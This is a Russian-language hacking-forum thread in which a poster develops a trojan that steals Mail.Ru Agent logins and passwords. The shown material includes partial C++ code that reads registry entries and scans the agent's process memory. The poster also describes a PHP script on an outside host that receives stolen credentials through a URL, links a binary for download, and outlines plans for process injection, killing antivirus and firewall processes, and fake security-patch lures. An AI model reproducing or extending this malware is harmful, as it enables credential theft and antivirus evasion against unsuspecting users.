Хай народ! Я тут новенький (сорри за флуд), но проф. занимаюсь сис. программированием! Увы PHP, Java и подобную хренотень не знаю (да и времени не было изучать), пишу исключительно на Си++ ну и изредко на Delphi....
Ближе к телу! Решил навоять небольшой троянчик для хака magent`a!

Сегодня утром написал сканер дампа сегмента данных MAgenta... Должен выдирать логин и пароль к сей почтовой приблуде! Программуля маленькая, сканит и ищет определенную сигнатуру, при обнаружении сохраняет в файл <C:\magent.pas> все что навыдирала!
Увы может работать достаточно долго, так как механизм не заточен на статический адрес в сегменте данных, а реализованно все в виде перебора памяти процесса magent... Наиболее нормальный механизм, так как адреса не всегда являются статичными и могут меняться от версии MAgenta!
начальные данные для сканинга беруться из реестра, вернее создается сигнатура для поиска, это почтовый адрес и хэш пароля(скорее всего)... Думаю дописать её в виде сервиса который бы после выдирания слал бы всю инфу либо на мыло, или на ICQ , скорее всего оба варианта будут использоваться! Прога у меня работает, на 3 тачилах тестил, и разные количества логинов генерировал.. Нужно потестить правильно ли выдирает пару логин и пароль! Посмотрите плиз! Сразу оговорюсь без всяких подстав и вирей! При тесте можете отрубиться от инета, чтобы не было нехороших мыслей, если все будет удачно, после завершения написания поделюсь!
Собственно сама прога:

[Потёр недоверчивый SladerNon.]


P.S. расширение ExE естесно... Прога сыра, могут быть баги, может провисать проц, так как сканин в цикле...
А вообще жду рецензий!

не качайте. возможно на 99% что там трой.имхо

Пахнет очень жестким на**ом

Интересно, а размер в 10 с небольшим килобайт, он писал на делфи или на c++))) и в том и в другом такого размера не добиться.

Программка, которая выводит сообщение на c++ весит килобайт 60, только что проверил.

Antivirus Version Update Result
AntiVir 7.3.0.21 01.09.2007 no virus found
Authentium 4.93.8 01.12.2007 no virus found
Avast 4.7.892.0 12.30.2006 no virus found
AVG 386 01.11.2007 no virus found
BitDefender 7.2 01.12.2007 no virus found
CAT-QuickHeal 9.00 01.12.2007 no virus found
ClamAV devel-20060426 01.12.2007 no virus found
DrWeb 4.33 01.12.2007 no virus found
eSafe 7.0.14.0 01.10.2007 suspicious Trojan/Worm
eTrust-InoculateIT 23.73.112 01.12.2007 no virus found
eTrust-Vet 30.3.3319 01.11.2007 no virus found
Ewido 4.0 01.11.2007 no virus found
Fortinet 2.82.0.0 01.12.2007 suspicious
F-Prot 3.16f 01.12.2007 no virus found
F-Prot4 4.2.1.29 01.12.2007 no virus found
Ikarus T3.1.0.27 01.09.2007 no virus found
Kaspersky 4.0.2.24 01.12.2007 no virus found
McAfee 4937 01.11.2007 no virus found
Microsoft 1.1904 01.12.2007 no virus found
NOD32v2 1972 01.11.2007 no virus found
Norman 5.80.02 01.12.2007 no virus found
Panda 9.0.0.4 01.12.2007 no virus found
Prevx1 V2 01.12.2007 no virus found
Sophos 4.13.0 01.11.2007 no virus found
Sunbelt 2.2.907.0 01.12.2007 no virus found
TheHacker 6.0.3.147 01.11.2007 no virus found
UNA 1.83 01.11.2007 no virus found
VBA32 3.11.2 01.12.2007 no virus found
VirusBuster 4.3.19:9 01.11.2007 no virus found

Интересно, а размер в 10 с небольшим килобайт, он писал на делфи или на c++))) и в том и в другом такого размера не добиться.
Ню-ню.... Ты родной программингом занимался когда нить? Слышал про написание программ без MFC! Это раз, а во вторых это не троян 100%, Писалось на Си++... И упаковано UPX`ом.. Мля хакеры.. Ламерством пованивает! =( Если уж в программинге не шарите нах что=то гнать?
Я сказал, что это не троян и ни вирь! Ну как вам докажешь?

Я сказал, что это не троян и ни вирь! Ну как вам докажешь?

Мало ли что ты сказал, ты кто вообще такой ?=)
С сегодняйшей регой к тому же.

Лично я таким методом впариваю трои, по этому и не верю.

Ну ладно, может просто наш новый дружок, захочет поделиться исходничком? а мы уж сами и скомпилируем и запакуем

Ну ладно, может просто наш новый дружок, захочет поделиться исходничком? а мы уж сами и скомпилируем и запакуем
312-625-207

Идея рульная. Но верить беспонтово если не видел исходников. Исходники в студию !

Идея рульная. Но верить песпонтово если не видел исходников. Исходники в студию !
Исходники не дам! Могу дать статическую либу и прототип функции, а там сами проект собирайте!

Я не верю тебе. ИМХО ты нае**щик, остальное меня не волнует.
Реально таким образом троев впаривают.

Я не верю тебе. ИМХО ты нае**щик, остальное меня не волнует.
Реально таким образом троев впаривают.
Угу.. А рульному хацкеру слабо дизасмом пройтись и проверить, а перед этим распаковать файлик? =) А? Хацкер? Али демагеры (Soft ICe и т.п.) Мы не знаем?

Провакация. лол

При таком раскладе мона firewall поставить на запрещенный режим для всего и проверить прогу. Файл создается на диске c:\ . Если что, то удалить прогу.

2аффтар
А сам протестить не можешь?

2аффтар
А сам протестить не можешь?
Ладно забейте... Че орать сразу!

верить... не верить... делать мне чтоль нечего... обойдусь и без этой проги.. не велика потеря...

Тестю за 5 wmz!

Мда. Мембер, который пишет на С++ программы размером 11kb не стал бы орать "запустите плиз!!! Очень надо!"
(имхо)Да и проще перехватить данные пре пересылке (за основу можно взять снифер nerezus'а.) логин\пароль передаются в открытом виде, без всяких хешей (сам знаю, ковырялся в протоколе)

Мда. Мембер, который пишет на С++ программы размером 11kb не стал бы орать "запустите плиз!!! Очень надо!"
(имхо)Да и проще перехватить данные пре пересылке (за основу можно взять снифер nerezus'а.) логин\пароль передаются в открытом виде, без всяких хешей (сам знаю, ковырялся в протоколе)
Вот не надо гнать только! Яж никого не напрягаю.. Повторюсь, прога весит 10 кил, так как запакована UPX кто не знает что это, ваши проблемы. А че говорить! Не суть..

Я буду тестировать, а то тут все испугались.

Я буду тестировать, а то тут все испугались.
ну и как? Работает? Или пароли меняешь=)

ну ты суперпуперпрограммистмега хэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)
Лови мега хацкер...
#include <windows.h>
#include <stdio.h>
#include<tlhelp32.h>
//--------------------------------------------
//--------------------------------------------
//--------------------------------------------
//--------------------------------------------
BOOL ParsingMagentDump(BYTE *, int, int);
//--------------------------------------------
//--------------------------------------------
bool fl_ = 0;
//--------------------------------------------
//--------------------------------------------
void printf_(char *msg)
{
char tmp[255];
sprintf(tmp,msg);
CharToOem(tmp,tmp);
printf("%s\n",tmp);
}
//--------------------------------------------
//--------------------------------------------
void write_file(BYTE* b, long i)
{

HANDLE hFile = CreateFile("C:\\magent.pas",
GENERIC_READ | GENERIC_WRITE,
0,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);

if(hFile != INVALID_HANDLE_VALUE)
{
DWORD ret;

if (!fl_)
{
fl_ = 1;
printf_("Файл C:\\magent.pas создан..");
}

SetFilePointer(hFile, 0, 0, FILE_END);
WriteFile(hFile,&b[0],i,&ret,NULL);
CloseHandle(hFile);
} else
printf_("Ошибка создания или открытия файла C:\\magent.pas..");
}
//--------------------------------------------
//--------------------------------------------
void start_scanmmemory()
{
HKEY key = 0;

printf_("Берем данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Mail.Ru\\Agent\\mra_logins",0,KEY_READ, &key) == ERROR_SUCCESS)
{

char svValueName[MAX_PATH];
memset(&svValueName,0,MAX_PATH);
int count=0;
DWORD cbValueNameLen = MAX_PATH;
DWORD cbValueDataLen = MAX_PATH;
DWORD dwType,pasLen;
char ttt[255];


while(RegEnumValue(key,count,svValueName,&cbValueNameLen,NULL,&dwType,NULL,&cbValueDataLen)!=ERROR_NO_MORE_ITEMS)
{

if (strlen(svValueName) > 0)
{
sprintf(ttt,"Логин : %s",svValueName);
printf_(ttt);

BYTE g[255];
BYTE login[255];
memset(&g,0,255);
memset(&login,0,255);
RegQueryValueEx(key,svValueName,NULL,&dwType,g,&pasLen);

int i = strlen(svValueName);
memcpy(login,&svValueName[0],strlen(svValueName));
memcpy(&login[i],g,4);



sprintf(ttt,"Размер пароля : %d",pasLen-4);
printf_(ttt);

i+=4;


ParsingMagentDump(login, i, pasLen);

}
memset(&svValueName,0,MAX_PATH);
cbValueNameLen = MAX_PATH;
cbValueDataLen = MAX_PATH;
count++;
}

if (count == 0)
printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");
RegCloseKey(key);
} else
printf_("Ошибка! Не удалось взять данные из реестра: Software\\Mail.Ru\\Agent\\mra_logins...");


}
//--------------------------------------------
//--------------------------------------------
BOOL ParsingMagentDump(BYTE * login, int ls, int ps)
{

printf_("Сканим список процессов, ищем magent.exe...");
HANDLE hProcessSnap;
PROCESSENTRY32 pe32;
HANDLE hProcess = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

if(hProcessSnap == INVALID_HANDLE_VALUE) return false;
// .......................
// Посмотрели и хватит!!!!

}

offset++;



if (offset > (0x800000) || fl) break;
}

} else
printf_("Не удалось найти процесс Magent.exe в списке процессов...");

CloseHandle(hProcessSnap);


return fl;
}
//--------------------------------------------
//--------------------------------------------
int main(int argc, char* argv[])
{
start_scanmmemory();
printf_("Работа закончена!");
return 0;
}

ну ппц. Взяди бы и на виртуальной тачке бы запустили эту хрень, если боитесь))))

ну ты суперпуперпрограммистмега хэцкер, ну не такие мы умные, как ты, ну не знаем мы шо ето такое и чем едят=) просто сам головой, или чем это там, подумай?! Я пишу те: я пипец программер, написал програмульку кот ломает фсе мыльники, скачай!!! и еще проверь как она работает, а то я сам не знаю, как она работает 0_о ню давай исходники кому-нить одному и он проверить, ф чем проблема?)

Если ты не шаришь в программировании, то лучше помолчи и не делай свои выводы "правильные", КУЛЦ МЕГА ХАЦКЕР И ПРОГРАММЕР. И как те сказали - харошь флудить.

2 darkf0x - ты решил траблу с записью всего процесса в файл ? И вообще, когда тя мона в ICQ найти ?

ПЕСДОС, если ты не шаришь в программировании, то лучше помолчи и не делай свои выводы "правильные", КУЛЦ МЕГА ХАЦКЕР И ПРОГРАММЕР. И как те сказали - харошь флудить.

2 darkf0x - ты решил траблу с записью всего процесса в файл ? И вообще, когда тя мона в ICQ найти ?
В будние дни постоянно.. В выходные изредка! =( Проблемы решил! Оказалось все тривиально! Хотя мне не нравится скорость перебора памяти.. Сейчас прикидываю как сразу вычислить относительный адрес сегмента, без тупого брута! =( Мыслишки есть! А так если есть желание пишите на dark_f0x@mail.ru или anclave2007@yandex.ru
Есть интересные мысли! Кстати эту "уязвимость" можно использовать для Фэйков! Народ пользуется почтовыми агентами, если официально всплывет, что он хачится просто, тогда можно фейки делать, типа заплаток от этой уязвимости! =) Ну а там все ограничивается фантазией хакера! Ну да ладно стучите кому интересно! Могу писать что угодно! =) Если грамотно поставите задачу можно написать прикольные трояные!
Программингом даавно занимаюсь и работаю программером... Пишу от сервисов до мультипотоковых приложений, от сокетовых приложений до прог под покеты...
P.S. Многие скептически отнеслись к моим постам, я понимаю, хотя не хотел ни кого пресаннуть!

lascer private 8.5 орёт что троянский червь

А мне не нравится пост. Я поставлю -2

darkf0x Маладец!
Все работает, в инет не лезет(те пароли ващи не отправляет никому), пароль от агента нашол, но у меня стояла галочка его сохранить. Довольно быстро, гдето за 1 минуту.


Так что уберите минус у него!!!!

darkf0x Маладец!
Все работает, в инет не лезет(те пароли ващи не отправляет никому), пароль от агента нашол, но у меня стояла галочка его сохранить. Довольно быстро, гдето за 1 минуту.


Так что уберите минус у него!!!!
А ладно... Забейте ребята... Каму интересна идея, допишу прогу тому дам заюзать... И Исходники..
По поводу троянских червей: По всей видимостри эвристика работает у этого антивиря сильно но глючно... Имхо проги имеющие в коде функции перебора и открытия левых процессов, а также чтение из них данных считать за трояны... Как-то... Хер знает.. логика понятна, но не всегда правильна!

У меня касперский не запалил ничего, и аутпост тоже.

У меня касперский не запалил ничего, и аутпост тоже.
на самом деле довольно долго память сканин и проц провешивает... Сейчас решу эту проблему и отвяжу от галки сохранять пароль (вернее от данных из реестра)!
Думаю брутить по другому алгоритму! А то народ не всегда галку ставит...

Сейчас готов скрипт работающий на левом хосте и отправляющий через урл логин и пароль на нужный ящик.. =) Так что скора будет релиз проги и скрипта обслуживающего прогу!

Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.

Логин и пароль у меня нашел исправно. Кароч, идея хорошая, хоть и узко применимая, но все равно +.
Согласен... Узкая, но для меня начинающего, надеюсь будет отправной точкой в мир хакерства! =)

Так на сегодняшний день уже:
1. Прога не привязана к реестру (не обязательно ставить галку сохранить пароль)
2. Поиск и парсинг происходит на-а-амного быстрее: (вычисление адреса PE заголовка в памяти + смещение к сегменту данных (размер проги)) Вычисление абсолютного адреса не получилось, имхо файл у них запакован UPX, соответственно PE не совсем тот что нужен мне.. =( Ну и хер с ним.. =) Мы тоже не лыком шиты!
Приблизительный адрес все равно вычисляем! Единственное чтобы вычислить адрес PE хидера, пришлось создавать поток в процессе жертве... Нормальные Антивири на такое могут заорать! =( Но без такого выкрутаса не получить правильного адреса PE хидера MAgenta...
3. Написал скрипт на php, лежит на
darkanclave.hut2.ru - примитив, но исправно должен отправлять пару параметров на указанную почту!
Вызывает так:
darkanclave.hut2.ru/getaccount.php?l=<param1>&p=<param2>&mail=<Ваша почта>
сейчас затачиваю прогу под него! Чтобы скрыто отправляла все что выдрала через этот URL...

Кому интересно новая(скоростная) тестовая версия (без отправки и с выводом лога) лежит: anclave2007.narod.ru/mh.ex

Заранее извеняюсь, если что-то не увидел, или просмотрел, но к проге есть мануал, как ею узать?
Заранее спасибо.
ПС автору спасибо за прогу

Прога еще в разработке. Жди пока он ее закончит.

Заранее извеняюсь, если что-то не увидел, или просмотрел, но к проге есть мануал, как ею узать?
Заранее спасибо.
ПС автору спасибо за прогу


там не нужен мануал просто отправляешь фаил и потом ловишь пасс
но чесно сказать неизвестно выложиться прога в паблик или нет потому как обидели человека очень сильно!

там не нужен мануал просто отправляешь фаил и потом ловишь пасс
но чесно сказать неизвестно выложиться прога в паблик или нет потому как обидели человека очень сильно!
Ну... Уж не так сильно, так немножко подобосрали.. =)
Короче народ! Программа почти написана, находится в стадии тестирования и разработки механизма интеграции вредоносного кода в левые процессы... Если не сложно!
Киньте названия процессов всех антивирей и файеров что вам встречались или которые вы юзаете!
Например:
outpost.exe
и т.п.
Это нужно для троя, он будет гасить это дерьмо в памяти
перед своей интеграцией в чужой процесс имхо эти пакостные помошники жизни юзверей перехватывают API вызовы, и блокируют интеграцию.. Чтобы этого не было их нужно замочить... Механизм собственного перехвата API не удобен, имхо после этого трой начинает плохо сосуществовать с антивирями и файерволами! =( Кто юзал к примеру OutpoSt и каспера одновременно на одной тачиле знают, что может быть полная жопа! Поэтому самы простой способ, вырубаем это дерьмо из памяти, интегрируемся, пускай юзер запускает заново... =)

вопрос как ты завершаешь сервис к примеру каспера? он помоему так просто не сдается (покрайней мере у меня не сдавался) на какой версии каспера тестишь? можешь дать кусок кода?
еще не по теме кто нибудь может показать как импортировать функцию из obj файла на с++? на делфи знаю и вот с с++ проблема и обьявлением.

еще не по теме кто нибудь может показать как импортировать функцию из obj файла на с++? на делфи знаю и вот с с++ проблема и обьявлением.


Открой .obj файл блокнотом, найди там функцию и скопируй все ее содержимое в непонятных символах прямо в исходник. С тебя плюсик!

у меня еще вопрос а вставлять прямо в ехешник?

Можеш попробовать=) в cpp файл есль я правильно понял о чем вы

Перезалейте бинарник, хочу его погонять.

вопрос как ты завершаешь сервис к примеру каспера? он помоему так просто не сдается (покрайней мере у меня не сдавался) на какой версии каспера тестишь? можешь дать кусок кода?
еще не по теме кто нибудь может показать как импортировать функцию из obj файла на с++? на делфи знаю и вот с с++ проблема и обьявлением.
Не совсем понятно, нах из объектного файла что-то импортировать? Не суть.. Любой процесс валится через:
DbgUiDebugActiveProcess

Перезалейте бинарник, хочу его погонять.
Мля.. Интересно админы narod.ru похерили файлик, или кто-то развлекается?

у меня еще вопрос а вставлять прямо в ехешник?
Функцию вставлять? =) Есть несколько способов: создавать еще одну секцию в PE Header`e, затем модифицировать таблицу импорта, и добавлять свою функцию в exe, но там есть гемморы, нужно знать как правильно вычислять адреса секций + коненчно структуру PE Headera(инфы везде полно), второй способ проще, открываешь процесс, резервируешь в нем память, копируешь туда функцию, и через создание нитки запускаешь свой код в нем! Правда есть вероятность, что антизараза вонять начнет! =)

че-то не скачиваеться....

че-то не скачиваеться....
Не тупим!!!

anclave2007.narod.ru/mh.ex

да не суть я так просто пытался искрометно пошутить (видимо не получилось...)

по поводу процесса DbgUiDebugActiveProcess помоему на шестом каспере не прокатит а люди у нас богатые пользуются самым свежим софтом =) а по поводу обжект-файл-исходнник просрал а велосипед изобретать лень...

по поводу процесса DbgUiDebugActiveProcess помоему на шестом каспере не прокатит а люди у нас богатые пользуются самым свежим софтом =) а по поводу обжект-файл-исходнник просрал а велосипед изобретать лень...

Что ж ты так с исходником то?

по поводу процесса DbgUiDebugActiveProcess помоему на шестом каспере не прокатит а люди у нас богатые пользуются самым свежим софтом =) а по поводу обжект-файл-исходнник просрал а велосипед изобретать лень...
DbgUiDebugActiveProcess =) Сомневаюсь что он может перехватить этот вызов... Хотя. Надо бы потестить... Каспера тока найду! А то у нас тут везде Symantec... =)